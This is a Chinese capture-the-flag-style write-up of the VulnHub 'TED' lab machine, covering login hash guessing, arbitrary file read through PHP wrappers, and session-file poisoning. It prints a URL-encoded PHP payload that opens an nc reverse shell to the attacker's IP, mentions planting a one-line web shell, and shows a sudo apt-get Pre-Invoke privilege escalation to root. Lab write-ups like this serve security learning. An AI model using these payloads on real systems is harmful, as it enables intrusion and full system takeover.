vulnhub-TED靶场过程记录

admin 2021年11月13日08:31:11评论119 views字数 695阅读2分19秒阅读模式

靶场地址:https://download.vulnhub.com/ted/Ted.7z

靶场设置 使用VM打开

vulnhub-TED靶场过程记录

vulnhub-TED靶场过程记录

扫描靶场网段,得到ip地址

vulnhub-TED靶场过程记录

访问网址是个登陆框

vulnhub-TED靶场过程记录扫描目录无果后,开始对登录框进行探索。

随便输入个密码后,发现密码或者密码hash错误,尝试多样的密码对比图如下

vulnhub-TED靶场过程记录vulnhub-TED靶场过程记录

看来密码是admin没错了,然后应该是hash加密后访问。

这里耗尽了大量的时间,得出来了结果(还是朋友做出来的,难受)

这里使用的是sha256加密,然后加密的字符串,字符转换大写


vulnhub-TED靶场过程记录

vulnhub-TED靶场过程记录


在在线网站进行大小写转换

vulnhub-TED靶场过程记录


一发入魂

vulnhub-TED靶场过程记录

获得下一步提示

vulnhub-TED靶场过程记录

在search存在任意文件读取

vulnhub-TED靶场过程记录

vulnhub-TED靶场过程记录


vulnhub-TED靶场过程记录

阅览cookie.php发现回显了文件

vulnhub-TED靶场过程记录

这里有一个authenticate.php

vulnhub-TED靶场过程记录


正常读取会出现退出登陆的情况,使用php伪协议读取到了文件

vulnhub-TED靶场过程记录


源码如下

vulnhub-TED靶场过程记录

同样的方式读取home

vulnhub-TED靶场过程记录

Home文件中有这么一句话

$_SESSION['user_pref'] = $_COOKIE['user_pref'];


任意文件读取到sessions目录

第一种

写入一句话木马

vulnhub-TED靶场过程记录


链接蚁剑

vulnhub-TED靶场过程记录

但是上传不了脚本

vulnhub-TED靶场过程记录

vulnhub-TED靶场过程记录

一时间不知道咋弄了


第二种

%3C?php%20exec('nc%20192.168.17.128


%202222%20-e%20/bin/bash')%20?%3E


反弹nc

vulnhub-TED靶场过程记录

回到sessions哪里,因为有nc


vulnhub-TED靶场过程记录


对shell进行升级

SHELL=/bin/bash script -q /dev/null

vulnhub-TED靶场过程记录


然后卡壳,最终解决如下


记录如下


输入

sudo apt-get update -o APT::Update::Pre-Invoke::="/bin/bash -i"

提权

vulnhub-TED靶场过程记录



本文始发于微信公众号(渗透云笔记):vulnhub-TED靶场过程记录

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年11月13日08:31:11
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   vulnhub-TED靶场过程记录https://cn-sec.com/archives/449348.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息